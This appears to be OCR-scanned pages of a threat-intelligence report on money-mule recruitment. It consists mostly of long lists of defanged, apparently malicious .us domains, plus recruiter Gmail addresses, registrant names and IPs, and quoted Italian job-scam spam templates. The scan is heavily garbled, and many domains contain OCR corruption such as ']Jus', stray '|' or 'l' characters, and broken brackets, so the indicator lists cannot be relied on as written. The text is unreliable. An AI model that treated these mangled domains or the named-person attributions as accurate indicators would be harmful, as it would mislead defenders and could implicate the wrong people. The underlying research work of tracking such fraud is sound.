hxxp://mountainrealty[.]us 
hxxp://allyak[.]us 

hxxp://giosa[.]us 
hxxp://homerosinformatics[.]us 
hxxp://chicagoblackhawksteamshop[. ]us 
hxxp://officialramsshop[.]us 
hxxp://circlecentremall[.]us 
hxxp://cheillx[.]us 
hxxp://paradisevacationclub[.]us 
hxxp://mykyoceradocumentsolutions[.]us 
hxxp://superhavanese[.]us 
hxxp://allstarautolights[.]us 
hxxp://cheleblog[.]Jus 
hxxp://atsport[.]us 
hxxp://remotesystemcontrolvial.]Jus 
hxxp://cleanestair[.]us 
hxxp://investblo[.]Jus 
hxxp://ellisfamil[.Jus 
hxxp://bagslive[.]us 
hxxp://mventertainment[.]us 
hxxp://salonseven[.]us 
hxxp://gardennails[.]Jus 
hxxp://rondorepor[.]us 

26962 


[12]paninde @ googlemail.com 
[13]panamajeld @ gmail.com 
[14]paninajob @ gmail.com 


[15]pananmakarriere @ gmail.com 


The same spam template localized in German is also known to have been used with 
the following Gmail accounts, again operated by money-mule recruitment organizations: 


[16]trzzbuded @ gmail.com 
[17]robertojens @ gmail.com 
[18]gradtul @ gmail.com 
[19]hrmiket @ gmail.com 
[20]mike.torhr @ gmail.com 
[21]evkoreyds @ gmail.com 
[22]mike.torhr @ gmail.com 


[23]support @ oplusdevelopment.com - the only exception 


The [24]second template used in the wild - the site returns a 404 error message - is called 
Green Star Services website, with the customer apparently still in a testing phrase. 
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hxxp://buenavistawinery[.]us 
hxxp://fitflopclearance[.]us 
hxxp://boxnetwork[.Jus 
hxxp://centralpiano[.]Jus 
hxxp://diveway[.]us 
hxxp://windsorestates[.]us 
hxxp://evergreenassistedliving[.]us 
hxxp://whocalles[.]Jus 
hxxp://hustlecast[.]us 
hxxp://amberchem[.]us 
hxxp://glasswasher[.]us 
hxxp://renhair[.]us 
hxxp://usguardian[.]us 
hxxp://acsonline[.]us 
hxxp://ninasworld[.]us 
hxxp://andrewandcassandral[. ]us 
hxxp://lanehardwoodfloors[.]us 
hxxp://sandebondosociet[.]us 
hxxp://brookingscap[.]us 
hxxp://icemachineking[.]us 
hxxp://alleghenycountytreaurer[.]us 
hxxp://breannawandrychlI. Jus 
hxxp://robbyaroundtheworld[.]us 
hxxp://westchestertribune[.]us 
hxxp://workandlearn[.]us 
hxxp://artificialdeals[.]us 
hxxp://briteo[.]us 
hxxp://brire[.]us 
hxxp://artistup[.]us 
hxxp://brianleenv[.]us 
hxxp://brandbuble[.]us 
hxxp://betterbehav[.]Jus 
hxxp://chamanesdelamor[.]us 
hxxp://airgunsale[.]us 


hxxp://chitownentertainment[.]us 


26963 


hxxp://affordablepowerfunding[.]us 
hxxp://americassummit[.]us 
hxxp://americachannel[.]us 
hxxp://aionc[.]Jus 
hxxp://allthingsliquorice[.]us 
hxxp://atlasautoandoffroad[.]us 
hxxp://acebal[.]us 
hxxp://cadplans[.]us 
hxxp://biosafespaces[.]us 
hxxp://cellxperts[.]us 
hxxp://classiicindustrial[.]us 
hxxp://certifiedportuguesetranslation[.]us 
hxxp://aspirejerseys[.]us 
hxxp://cannoner[.]us 
hxxp://amandaberry[.]us 
hxxp://buberride[.]us 
hxxp://beautycosmetics[.]us 
hxxp://beyontrip[.]us 
hxxp://capilla[.]us 
hxxp://bestpaintsprayers[.]us 
hxxp://billyclub[.Jus 
hxxp://advocatesforliberty[.]us 
hxxp://cannabloom|[.]us 
hxxp://aarone[.]us 
hxxp://antonovichfurs[.]us 
hxxp://astromix[.]us 
hxxp://cbadvantage[.]us 
hxxp://amaranthine[.]us 
hxxp://cleanersmok[.]us 
hxxp://angelwilson[.]us 
hxxp://bigoton[.]us 
hxxp://creativeblinds[.]Jus 
hxxp://containerhouse[. ]us 
hxxp://cookandthethief[.]us 
hxxp://dorakeplant[.]us 

26964 


hxxp://copecherry[.]us 
hxxp://diggersdelivery[.]us 
hxxp://deliverynow[.]us 
hxxp://concretetech[.]Jus 
hxxp://comprovet[.]us 
hxxp://cnewyllansf[.]us 
hxxp://designtalk[.]us 
hxxp://cpsasphaltmaintenance[.]us 
hxxp://desktoptowers[.]us 
hxxp://divstore[.Jus 
hxxp://cranbarry[.]Jus 
hxxp://desouzaautoservice[.]us 
hxxp://conjunction[.]us 
hxxp://dentaltourist[.]us 
hxxp://dertbe[.]us 
hxxp://darkthoughts[.]us 
hxxp://conductival[.]us 
hxxp://coverallconsulting[.]us 
hxxp://dentbay[.]us 
hxxp://deskitsolutions[.]us 
hxxp://crossgenerations[.]us 
hxxp://dreamhometeam[.]us 
hxxp://dreaminge[.]us 
hxxp://documentaryphotography|[.]us 
hxxp://defensemobilitytactical[.Jus 
hxxp://codethebrand[.]us 
hxxp://deficiencies[.]us 
hxxp://explorespringfieldor[.]us 
hxxp://fastairdelievery[.]Jus 
hxxp://educationsample[.]Jus 
hxxp://evrard[.]us 
hxxp://healingworld[.]Jus 
hxxp://healthytastebuds[.]us 
hxxp://elitetaxservice[.]us 


hxxp://fashionhosue[.]us 


26965 


hxxp://futurestyle[.]us 
hxxp://getall[.Jus 
hxxp://futurebasestation[.]us 
hxxp://estudiomicasal[.]us 
hxxp://exeinteriors[.]us 
hxxp://greenlifebeauty[.]us 
hxxp://healthycarpet[.Jus 
hxxp://globalrealtor[.Jus 
hxxp://everydaydiscovery[.]us 
hxxp://georgewrightconstruction[.]us 
hxxp://eservationcentre[.]us 
hxxp://eastcoastmusic[.]us 
hxxp://feelyoung[.]us 
hxxp://funniestpranks[.]us 
hxxp://femeninasbolivial.Jus 
hxxp://gohear[.]us 
hxxp://ellimechaphotpro[.]us 
hxxp://goodmorningfriday[.]us 
hxxp://healthcaredetectivel[.]Jus 
hxxp://gearbuy[.Jus 
hxxp://gioconttal[.]us 
hxxp://geinsurance[.]us 
hxxp://globalhealthforhumanity[.]us 
hxxp://fashionupdate[.]us 
hxxp://existertrav[.]us 
hxxp://exclusivehomedecor[.]us 
hxxp://glanvillegaller[.]us 
hxxp://ertis[.]us 
hxxp://freewall[.Jus 
hxxp://forseo[.]us 
hxxp://esace[.]us 
hxxp://enhancementpills[.]us 
hxxp://gomegadeall[.]us 
hxxp://floraspringhealthsupImnet[.]us 
hxxp://epithelial[.]us 

26966 


hxxp://gonzalezandsonstransport[.]us 
hxxp://hamiltonphotography[.]Jus 
hxxp://freecopts[.]Jus 
hxxp://freedomfortheoppressed[.]us 
hxxp://eltadigital[.Jus 
hxxp://homedesignmedial[.]us 
hxxp://highstrung[.]us 
hxxp://hrsupportservices[.]us 
hxxp://hostingxpress[.]us 
hxxp://hotelroma[.]us 
hxxp://hoodielovers[.]us 
hxxp://hurtbusters[.]us 
hxxp://indexresearch[.]us 
hxxp://elizabear[.]us 
hxxp://desurefit[.]us 
hxxp://dentaldelsol[.Jus 
hxxp://laidletters[.Jus 
hxxp://laboratoriodentall[.]us 
hxxp://kurtsalmonappstore[.]us 
hxxp://leonrealestate[.]us 
hxxp://levelupins[.]us 
hxxp://longereyelashes[.]us 
hxxp://leporterai[.]us 
hxxp://lindonrealestate[.]us 
hxxp://lawerservices[.]us 
hxxp://lionarivv[.]us 
hxxp://litalp[.Jus 
hxxp://livelif[.Jus 
hxxp://libertychicken[.]us 
hxxp://mardinsohbet[.]us 
hxxp://makethehappyl[.]us 
hxxp://maestrobrows[.]us 
hxxp://mitrasafe[.]us 
hxxp://makel[.]Jus 


hxxp://lululemonoutletstoreonline[.]us 


26967 


hxxp://mcnutrition[.Jus 
hxxp://midwestdiamond[.]us 
hxxp://mensajes[.]us 
hxxp://markmayministry[.]us 
hxxp://nostrado[.]us 
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BRAND IMAGE 


@ ITROOUCTION > OURSERVICE. | 


© 2009 BRAND PAGE. inc. Al highs Reserves. 


This cannot be said for yet another customer of the same service standardizing the money 
mule recruitment process by template-izing it. [25]The fifth template, is actually a bogus com- 
pany called Brand Image Advertising Agency (internationalbrandimage .com - 91.213.72.142 
- Email: Sergey Stepanov; userovsky@gmail.com describing itself as: 


"Advertising agency “Brand Image” helps its clients to perform their products and ser- 
vices the right way. We never offer you anything additional that we didn’t discuss at the 
beginning. The motto of our work is honesty and we believe that this is a very important thing 
in advertising. 


We were created to help you in selling products and services. “Brand Image” typically 
attempts to assist you in building your brand by persuading potential customers to purchase 
or to consume more of your brand of product or service. It is vivid from the name of our 
agency that we are doing a lot for your brand. Actually we are constantly working at brand 
management. It is known that the value of the brand is determined by the amount of profit it 
generates for the manufacturer. Advertising agency “Brand Image” clearly understands the 
main principles of brand name and will be glad to help you in choosing the right name for your 
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company. 


Advertising agency “Brand Image” proudly presents a great variety of services it provides. 
The main advantage of our work is that our management staff is always on-line and works 
24/7 for your convenience. Moreover, our offices are located all over the Europe and in the 
USA that makes our work fast and comprehensive. First of all let us introduce you what exactly 
we offer our clients. However if you happen to have any questions in understanding what this 
or that service means, you can always find our contacts and use them in communicating with 
us concerning our advertising offers." 


Sample [26]spam message localized in Italian used to recruit for Brand Image Advertis- 
ing Agency: 


"Salary: 4,000 Euro; 10 % di ciascuna operazione di pagamento - conto personale 10 %; 
15 % di ciascuna operazione di pagamento - conto corporativo 15 %; Location: Italy Ac- 
cettazione dei pagamenti dai clienti nella vostra zona ? Accepting payments from customers 
in your area? favorire a realizzare gli obiettivi finanziarie di Compagnia.Le condizioni di lavoro. 
Il lavoro tranne internet - ufficio, e anche con le banche ei sistemi di trasferimenti veloci. 
Gli interessati ambosessi possono inviare CV con consenso al trattamento dei dati personali 
(art.13, d.lgs 196/03) e requisiti di contatto al e-mail. Se a Voi interessa questo lavoro, 
mandate i! curriculum alla nostra: judicialHathawayv?@gmail.com Cordialmente, Sincerely, 
David De Simone David De Simone" 


2701 


hxxp://sdsportsbetting[.]us 


hxxp://shoesoffsale|[.]us 


hxxp://steveshomeimprovementnc[.]us 


hxxp://sneakersshop[.]us 


hxxp://sellitwith[.]Jus 


hxxp://precancerintervention[.]us 


hxxp://reminicent[.]us 
hxxp://tcproductions[.]us 


hxxp://szetoshepard[.]us 


hxxp://oklahomatreatmentcenters[.]us 


hxxp://righttotravell.]us 
hxxp://selectgaragedoor[.]us 
hxxp://tableone[.]us 
hxxp://technologyomatic[.]us 
hxxp://tarin[.Jus 
hxxp://teatogo[.]us 
hxxp://sensori[.]us 
hxxp://roomrents[.]us 
hxxp://seoleads[.]Jus 
hxxp://strapbeauty[.]us 
hxxp://spinningloft[.Jus 
hxxp://restaurantmanl[.]us 
hxxp://srilankaimmigration[.]us 
hxxp://ometrack[.]us 
hxxp://solutionez[.]us 
hxxp://operationgigo[.]us 
hxxp://stockimage[.]us 
hxxp://shemedial[.]us 
hxxp://stonedepot[.]Jus 
hxxp://ohioschoolphotos[.]us 
hxxp://rehabspecialists[.]us 
hxxp://redlegionmunitions[.]us 
hxxp://offshorehosting[.]us 
hxxp://starshinestudio[.]us 


hxxp://kidscenter[.]us 


26983 


hxxp://williamsbuildingcompany[.]us 
hxxp://thepeoplesproject[.]us 
hxxp://umedtech[.]us 
hxxp://topgardentips[.]us 
hxxp://theaterseatingfurniture[.]us 
hxxp://threeteen[.]us 
hxxp://threevillagerealto[.]us 
hxxp://viralpandal[.]us 
hxxp://unitedproperttsolutions[.]us 
hxxp://threataxis[.]us 
hxxp://theboost[.]us 
hxxp://vinyldreams[.]us 
hxxp://yourbeautifull[.]us 
hxxp://willowrive[.Jus 
hxxp://vascularscaffoldtherapyl.]us 
hxxp://toryburchonline[.]us 
hxxp://tonalin[.]us 
hxxp://thebabyproject[.]us 
hxxp://ukimmigrationattorneyflorida[.]us 
hxxp://wonderfullyplus[.]Jus 
hxxp://weandnow[.]us 
hxxp://yournextmovel[.]us 
hxxp://touringtails[.Jus 
hxxp://valiantknight[.]us 
hxxp://tictocwatchrepairs[.]us 
hxxp://thebigshow[.]us 
hxxp://tuckerallyminted[.]us 
hxxp://thetacomaguide[.]us 
hxxp://trinitysteel[.Jus 
hxxp://themontignacmethod[.]us 
hxxp://thenam[.]us 
hxxp://unrealdeals[.]us 
hxxp://wechinese[.]us 
hxxp://victorybaptistwashingtongal[.]us 
hxxp://turkamerikandiasporakonseyil[.]us 
26984 


hxxp://worthday[.]us 
hxxp://thestartupstore[.]us 
hxxp://windwardgaming[.]us 
hxxp://thebabystore[.]us 
hxxp://usbettingsites[.]us 
hxxp://thelawfirm[.]us 
hxxp://thesaini[.]us 


hxxp://tricol[.Jus 


hxxp://valdiviesoconstructionllc[.]us 


hxxp://vrimmersivereality[.]us 
hxxp://thekineticseries[.]us 
hxxp://transaccioneswps[.]us 
hxxp://weidesign[.]us 
hxxp://walmpress[.]us 
hxxp://xdoctor[.]us 
hxxp://forcemechanicall[.]us 
hxxp://apprendreri[.]us 
hxxp://cocktailcollective[.]Jus 
hxxp://blindspotmirrors[.]us 
hxxp://dreyeronline[.]us 
hxxp://blakeandtess[.]us 
hxxp://climatehour[.]us 
hxxp://codevative[.]Jus 
hxxp://aldospainting[.]us 
hxxp://aimautomobileguarant[.]us 
hxxp://academyhouse[.]us 
hxxp://angeliccreations[.]us 
hxxp://allamericannetwork[.]us 
hxxp://asarlholdings[.Jus 
hxxp://amateuraustralians[.]us 
hxxp://acoinc[.]us 
hxxp://allizwell[.]Jus 
hxxp://artmt[.]us 
hxxp://aquarionllc[.Jus 


hxxp://alexanderunlimited[.]us 


26985 


hxxp://adpartners[.]us 
hxxp://altaloma[.]us 
hxxp://addictionconsultantsnetwork[.]us 
hxxp://cardinalridgebakery[.]Jus 
hxxp://biblechannell[.]us 
hxxp://comsupport[.]us 
hxxp://constructionspecialists[.]us 
hxxp://corporatelinecarservice[.]us 
hxxp://cartoonhdapk[.]us 
hxxp://crystalit[.]us 
hxxp://carlies[.]us 
hxxp://breakroomsports[.]us 
hxxp://brony[.Jus 
hxxp://bassoon[.]us 
hxxp://buckinghamautol[. Jus 
hxxp://biogaming[.]us 
hxxp://besteducationaltoys[.]us 
hxxp://bestbiography[.]us 
hxxp://bruschettabar[.]us 
hxxp://corecreativegroups[.]us 
hxxp://bellascent[.Jus 
hxxp://cheapsaintsjerseys[.]us 
hxxp://blasian[.]us 
hxxp://cluber[.]us 
hxxp://cheapnfl[.]us 
hxxp://brillun[.]us 
hxxp://bestireviews[.]us 
hxxp://blankplasticcard[.]us 
hxxp://cumedicinr[.]us 
hxxp://cameratec[.]us 
hxxp://besttastybabe[.]us 
hxxp://becomeamodell.]us 
hxxp://beautybyangell[.]us 
hxxp://bitcoinemails[.]us 
hxxp://carolyncatering[.]us 
26986 


hxxp://behindthedoorproductions[.]us 
hxxp://beautifulthings[.]us 
hxxp://bjconstructions[.]us 
hxxp://cheban[.]us 
hxxp://commodityfuturestrading[.]us 
hxxp://cahardmoney[.]us 
hxxp://beedhealth[.]us 
hxxp://comfortsboutique[.]us 
hxxp://communitysos[.]us 
hxxp://chamiliacharms[.]us 
hxxp://beiserspace[.]us 
hxxp://davidlawrence[.]us 
hxxp://nomelandlogistics[.]us 
hxxp://innovationfactory[.]Jus 
hxxp://goingdutch[.]us 
hxxp://jerseyshorehomesforsale[.]us 
hxxp://flowersfoods[.]us 
hxxp://flashtrend[.]us 
hxxp://imagingit[.]us 
hxxp://fortniteofers[.]us 
hxxp://hontru[.]us 


hxxp://gmlengineering[.]us 


hxxp://ereceivedsstrangesecurerocks[.]us 


hxxp://formhovin[.]us 
hxxp://formin[.Jus 
hxxp://inais[.]us 
hxxp://firstinsighteyes[.]us 
hxxp://jhpaintingandhardscaping[.]us 
hxxp://itre[.]Jus 
hxxp://holocoin[.Jus 
hxxp://generalsurgeon[.]Jus 
hxxp://homeoutdoor[.]Jus 
hxxp://ibuilder[.]us 
hxxp://goldenvalleyvanlines[.]us 


hxxp://ettoline[.]us 


26987 


hxxp://illinoispay[.]Jus 
hxxp://ideapros[.]us 
hxxp://everso[.]us 
hxxp://instantsfun[.]us 
hxxp://freshlegumes[.]Jus 
hxxp://glaca[.Jus 
hxxp://jeremiblurton[.]Jus 
hxxp://insig[.]us 
hxxp://hottubdealer[.]Jus 
hxxp://hodomania[.]us 
hxxp://infinityconsult[.Jus 
hxxp://freshprom[.]us 
hxxp://facethemusic[.]us 
hxxp://fontono[.]us 
hxxp://doersindex[.]us 
hxxp://kansascityrefinishing[.]us 
hxxp://deviceideaday[.]us 
hxxp://easyhairdress[.]us 
hxxp://heintzmancorporation[.]us 
hxxp://greatcontent[.]us 
hxxp://hankerchief[.]Jus 
hxxp://ecifinancial[.Jus 
hxxp://ketomezyvshop[.]us 
hxxp://jobsearchforindial[.]us 
hxxp://donandjennifer[.]us 
hxxp://directorfusion[.]us 
hxxp://donorth[.]us 
hxxp://earntheory[.]us 
hxxp://directnewleads[.]us 
hxxp://kindof[.]Jus 
hxxp://joshgregoryrealestate[.]us 
hxxp://freefarms[.]us 
hxxp://justrecipes[.]us 
hxxp://kingdombuildingministries[.]us 
hxxp://emassachusettstaxreturn[.]us 
26988 


hxxp://hellorentals[.Jus 
hxxp://electladendorf[.Jus 
hxxp://kamanahai[.]us 
hxxp://ebdesigns[.]us 
hxxp://docholliday[.]us 
hxxp://johnsherrod[.]Jus 
hxxp://designconvicted[.]us 
hxxp://digitalebooks[.]us 
hxxp://keralahouseboats[.]us 
hxxp://gymnasticusa[.]us 
hxxp://electroserve[.]us 
hxxp://healthilymail[.Jus 
hxxp://joemart[.]us 
hxxp://jobdetective[.]us 
hxxp://hiddendeals[.]Jus 
hxxp://loquetegustal[.]us 
hxxp://leimaginer[.]us 
hxxp://michaelgraves[.]us 
hxxp://lindseyandandrew[.]us 
hxxp://lessonsforlifetrust[.]us 
hxxp://maskmarket[.]us 
hxxp://marmots[.]us 
hxxp://ladiesshoes[.]us 
hxxp://monoclinic[.Jus 
hxxp://marleene[.]us 
hxxp://maswell[.]us 
hxxp://limagenerations[.]us 
hxxp://lighthouseservicesllc[.]us 
hxxp://liangtsewellness[.]us 
hxxp://lafwell[. Jus 
hxxp://merchmania[.]us 
hxxp://militaryepack[.]us 
hxxp://meetdreamdate|[.]us 
hxxp://meritbrands[.]us 


hxxp://littlereddoor[.]us 


26989 


hxxp://lingelbach[.]us 
hxxp://kmbphotos[.]us 
hxxp://mizunovolleyballshoes[.]us 
hxxp://kinia[.]Jus 
hxxp://metasupply[.]us 
hxxp://metaloans[.]us 
hxxp://mymobilenation[.]us 
hxxp://myindependenceday[.]us 
hxxp://myloanforgiveness[.]us 
hxxp://mysoapsandstuff[.]us 
hxxp://mwelectric[.]us 
hxxp://naturalsolution[.]us 
hxxp://needleminders[.]us 
hxxp://nesshop[.]us 
hxxp://newbeginningservices[.]us 
hxxp://newhera[.]us 
hxxp://newnikeshoesonsale[.]us 
hxxp://offsetcredit[.]us 
hxxp://nnectorthpahomarker[.]us 
hxxp://northfaceapexbionicjacket[.]us 
hxxp://nortonrosefulbright[.]us 
hxxp://richardporter[.]us 
hxxp://prettylittletjing[.Jus 
hxxp://silverpresent[.]us 
hxxp://politicalsky[.Jus 
hxxp://ringoldcounty[.]us 
hxxp://realestatewebsitedesign[.]us 
hxxp://painsupportgroup[.]us 
hxxp://precisionperformance[.]us 
hxxp://perezlandscaping[.]us 
hxxp://protopreneurs[.]us 
hxxp://shipcon[.]us 
hxxp://rmnderskasoq[.]us 
hxxp://shortcircuitclan[.]us 
hxxp://pathwayministries[.]us 
26990 


hxxp://pasoli[.]us 

hxxp://poetral.]us 
hxxp://pyrocandles[.]us 
hxxp://periscopelive[.]us 
hxxp://pandoraringsjewelry[.]us 
hxxp://roardlismilliderlik[.]us 
hxxp://pawleysislandbrewing[.]us 
hxxp://peaceofmindinretirement[. ]us 
hxxp://protectcenter[.]us 
hxxp://plantalytics[.Jus 
hxxp://smartcoast[.]us 
hxxp://pharmiag[.]us 
hxxp://sanantoniodebtconsolidation[.]us 
hxxp://onereason[.]us 
hxxp://ominihomef[.]us 
hxxp://pddperfectdarlingdog[.]us 
hxxp://rachaeljones[.]us 
hxxp://professionalpain[.]us 
hxxp://reauestysstrangesecurenetwork[.]us 
hxxp://singgaravellosubramaniam|[.]us 
hxxp://optimalhealthcare[.]us 
hxxp://porshaestronger[.]us 
hxxp://raskebriller[.]us 
hxxp://puresouls[.]us 
hxxp://pythonlanguage[.]us 
hxxp://pthemel[.]us 
hxxp://preciouscards[.]us 
hxxp://sarderkamruzzaman[.]us 
hxxp://realliberty[.Jus 
hxxp://paanesthesiaworld[.]us 
hxxp://satisfactor[.]Jus 
hxxp://propertysales[.]Jus 
hxxp://paleodietrecipes[.]us 
hxxp://romestive[.]us 


hxxp://percentagegiving[.]us 


26991 


hxxp://porterm[.]us 
hxxp://pieratti[.Jus 
hxxp://pomarico[.]us 
hxxp://plumbingheatingservices[.]us 
hxxp://rudate[.]us 
hxxp://republicanview[.]us 
hxxp://outletsdeall[.Jus 
hxxp://protechnic[.]us 
hxxp://oofbrand[.]Jus 
hxxp://ptericeedainicipetr[.]us 
hxxp://selfcheckout[.]us 
hxxp://satinsilkyhair[.]us 
hxxp://supportswf[.]us 
hxxp://sperez[.]us 
hxxp://sorteo[.]us 
hxxp://springle[.]us 
hxxp://tctalk[.]us 
hxxp://speedmachine[.]us 
hxxp://southeservices[.]us 
hxxp://springoflove[.]us 
hxxp://syassil[.]us 
hxxp://teachsignalboosterjhsjh[.Jus 
hxxp://starkcom[. ]us 
hxxp://swari[.]us 
hxxp://susports[.]us 
hxxp://aspectclinica[.]us 
hxxp://ardzorg[.]us 
hxxp://anastruetaste[.]us 
hxxp://arcadestudio[.]us 
hxxp://advanceenergypatches|[.]us 
hxxp://annesundara[.]Jus 
hxxp://asoundguy[.]us 
hxxp://aeomfashion[.]us 
hxxp://ayoungeryou[.]us 
hxxp://bisonenergy[.]Jus 
26992 


ENGLISH ITALIANO 


“Perfect Finance Conditions 


_ 4 
IPC are Provided 


home | about us | services | careers | contacts | login 


S | Privacy poley 


A second template is known known to have been used, this time offering different commis- 
sion: 


"Rappresentante finanziario Informazioni di posti di lavoro Post Date: 12/04/2009 Salario: 
3.000 EUR/mese + 5 % di cCiascuna operazione di bonifico Location: Italia Generale Description 
Accettazione dei pagamenti dai clienti nella vostra zona e favorire a realizzare gli obiettivi fi- 
nanziarie di Compagnia. Le condizioni di lavoro II lavoro tranne internet - ufficio, e anche con le 
banche ei sistemi di trasferimenti veloci. Contact Details / Apply for this Job Se a Voi interessa 
questo lavoro, mandate i! curriculum alla nostra individualpeoplecapitalgroup7@googlemail- 
.com individualpeople .biz/go.php?sid=7 In attesa di Vostro riscontro, saluti manager HR 
Robert J. Wilson" 


What we've got here is an identical soam template using a template offered by a man- 
aged money mule recruitent design vendor, that is advertising another bogus brand, with the 
domain name itself registered using the same detaisl as Brand Image Advertising Agency (inter- 
nationalbrandimage .com - 91.213.72.142 - Email: Sergey Stepanov; userovsky@gmail.com). 
In the case of the localized to Italian spam message that’s yet another bogus brand Individual 
People Capital Group, individualpeople .org - 91.213.72.142 - Email: Sergey Stepanov; 
userovsky@gmail.com. 


2702 


hxxp://abettertime[.Jus 
hxxp://scottil[.Jus 
hxxp://rqkqrwajdal[.]Jus 
hxxp://fancyjewels[.Jus 
hxxp://boatid[.Jus 


hxxp://fancyice[.]us 


hxxp://grandesmaestrosdelaluz[.]us 


hxxp://cohana[.]us 
hxxp://droverrid[.]us 
hxxp://equineway[.]us 


hxxp://favel[.]us 


hxxp://hendersonmobilenotary[.]us 


hxxp://desertnightsmobilecasino[.]us 


hxxp://biotechsolutions[.]us 
hxxp://daysonmarke[.]us 
hxxp://dantruon[.]Jus 
hxxp://hotelestrinidad[.Jus 
hxxp://nhomeoflabretrievers[.]us 
hxxp://blithe[.]us 
hxxp://dancecountry[.]us 
hxxp://hitechehrexam[.]us 
hxxp://homebedfurniture[.]us 
hxxp://hotelsinvestment[.]Jus 
hxxp://goingsane[.]us 
hxxp://keepfoxsportsnorth[.]us 
hxxp://jinshal.Jus 
hxxp://Idconstruction[.]us 
hxxp://jinglelady[.]us 
hxxp://leaderdesign[.]us 
hxxp://carefromanywhere[.]us 
hxxp://despotism[.]us 
hxxp://leslieroofing[.]us 
hxxp://honeymoongetaway[.]us 
hxxp://jacksonlandscape[.]us 


hxxp://histgroup[.]us 


26993 


hxxp://contactzaral[.]us 
hxxp://boxstore[.]us 
hxxp://birkenstockshop[.]us 
hxxp://belverbears[.]us 
hxxp://awesomeorlando[.]us 
hxxp://groupelogo[.]us 
hxxp://agreencompany|.]us 
hxxp://databinders[.]us 
hxxp://abandonedlots[.]us 
hxxp://homesforsalefloridal[.]us 
hxxp://healthyknees[.]us 
hxxp://carboncases[.]us 
hxxp://blessedmom[.]us 
hxxp://kilgoreindustries[.]us 
hxxp://globear[.]us 
hxxp://collegepartystorie[.]us 
hxxp://handwear[.]Jus 
hxxp://dzinewerx[.]us 
hxxp://gtell[.Jus 
hxxp://dodgefuelfilters[.]us 
hxxp://formatti[.Jus 
hxxp://katieandchris[.]us 
hxxp://creatiivetent[.Jus 
hxxp://energyestimator[.]us 
hxxp://concordmills[.]us 
hxxp://hirethislens[.Jus 
hxxp://dramatists[.]us 
hxxp://conservativepc[.]us 
hxxp://cartoonme[.]us 
hxxp://applydesign[.]us 
hxxp://khprofor[.]us 
hxxp://desireezirolli[.]us 
hxxp://handylife[.]us 
hxxp://ketodiwerishop[.]us 
hxxp://awesomeauctions[.]us 
26994 


hxxp://alyseandcam|[.]us 
hxxp://dnsonlin[.]us 
hxxp://cardtricks[.]us 
hxxp://ineah[. Jus 
hxxp://davisfamilyreunion[.]us 
hxxp://linkhomedecor[.]us 
hxxp://donlineshop[.]us 
hxxp://neadlesschicken[.]us 
hxxp://canineadventures[.]us 
hxxp://nhomehackss[.]us 
hxxp://gourmetgiftcollections[.]Jus 
hxxp://letsalltalk[.Jus 
hxxp://brilliantnurse[.]us 
hxxp://cmcomputers[.]us 
hxxp://hotlife[.Jus 
hxxp://lapuente[.]us 
hxxp://aactrucking[.]us 
hxxp://fitnessvideosite[.]us 
hxxp://learnscape[.]us 
hxxp://batmangames|.]us 
hxxp://isitesdigitalmediallc[.Jus 
hxxp://creativecoating[.]us 
hxxp://gemsforless[.]us 
hxxp://lookseeddesign[.]us 
hxxp://blackpine[.]Jus 
hxxp://kmcfarland[.]us 
hxxp://jkhome[.]Jus 
hxxp://finalopt[.]Jus 
hxxp://fxpresyk[.Jus 
hxxp://himalayanownersclub[.]us 
hxxp://impactgroupholdings[.]us 
hxxp://blackeagleequipment[.]us 
hxxp://careandlove[.]us 
hxxp://basecampvans[.]us 


hxxp://dropwing[.]us 


26995 


hxxp://candlesoydeuce[.]us 
hxxp://hearthboost[.]us 
hxxp://imransbarbersalon[.]us 
hxxp://insurancephoto[.]us 
hxxp://listahouse[.]us 
hxxp://cardamom[.]us 
hxxp://incorporations[.]us 
hxxp://horsecavetheatr[.]us 
hxxp://apartmentsandhousesforrent[.]us 
hxxp://energychoices[.]us 
hxxp://jossandmain[.]us 
hxxp://frontsightdefense[.]us 
hxxp://gistmack[.]us 
hxxp://greendepartment[.]us 
hxxp://jpsbschooll[.]us 
hxxp://absorbingstints[.]us 
hxxp://kitala[.]us 
hxxp://illuminatedconsulting[.]Jus 
hxxp://bravernewworld[.]us 
hxxp://kdjanitorservice[.]us 
hxxp://felonsua[.]us 
hxxp://integrityautobrokers[.]us 
hxxp://desertinnmedicalcenter[.]us 
hxxp://bankerslifeagent[.]us 
hxxp://embracinglif[.Jus 
hxxp://communitylistingboar[.]us 
hxxp://crystalhost[.]us 
hxxp://exerciseessentials[.]us 
hxxp://delllaptopbatter[.]Jus 
hxxp://lionway[.]us 
hxxp://maturezone[.]us 
hxxp://propertyattorneyl[.]us 
hxxp://yournmatchI[.]us 
hxxp://plumbplumbing[.]us 
hxxp://theinformers[.]us 

26996 


hxxp://dreamparrotsaviary[.]us 
hxxp://deltaticketsvouchers[.]us 
hxxp://earnearns[.]us 
hxxp://carryonshoulderbags[.]Jus 
hxxp://estibrands[.]us 
hxxp://bbsmart[.]us 
hxxp://martimedocumentation[.]us 
hxxp://gtdistribution[.]us 
hxxp://technologypresident[.]us 
hxxp://intercessionversity[.]us 
hxxp://bhhseducation[.]us 
hxxp://inlandempireer[.]us 
hxxp://waterproofpouches[.]us 
hxxp://alfatronics[.]us 
hxxp://kitchenculture[. ]us 
hxxp://mypandastream[.]us 
hxxp://sballc[.Jus 
hxxp://ralphlaurenonlineoutlet[.]us 
hxxp://caentes[.]us 
hxxp://cesiinc[.]Jus 
hxxp://azborderwatch[.]us 
hxxp://carseatcushions[.]us 
hxxp://compucam[.]us 
hxxp://mountaintopsupply[.]us 
hxxp://razoredgerecruiting[.]us 
hxxp://homeservicesolutions[.]us 
hxxp://ideacamp[.]us 
hxxp://postimage[.]us 
hxxp://prestigeautorepair[.]us 
hxxp://altwaystoheal[.]us 
hxxp://airsole[.]us 
hxxp://bigblockchain[.]us 
hxxp://bodylifedirect[.]us 
hxxp://pureskinaesthetics[.]us 


hxxp://supporthemp[.]us 


26997 


hxxp://vernessersofterrake[.]us 
hxxp://eventcrowd[.]us 
hxxp://dmvuslicenseupdate[.]us 
hxxp://edesirs[.]us 
hxxp://escortlogistics[.]us 
hxxp://mgmtcleaning[.]us 
hxxp://americanreloading[.]us 
hxxp://advantageplumbing|[.]us 
hxxp://ticsyste[.]us 
hxxp://thatonegeek[.]us 
hxxp://hlinstitute[.]us 
hxxp://ioncard[.]us 
hxxp://versatileconsulting[.]us 
hxxp://aonews[.]us 
hxxp://islanddreams[.]us 
hxxp://thesimmonsfamily[.]us 
hxxp://thrillington[.Jus 
hxxp://ccentetliarandantis[.]us 
hxxp://coupchop[.]us 
hxxp://keyindustries[.]us 
hxxp://memorytrail[.]us 
hxxp://thegloriouscause[.]us 
hxxp://spermcocktail[.]us 
hxxp://banditworkshop[.]us 
hxxp://ebdesignz[.]us 
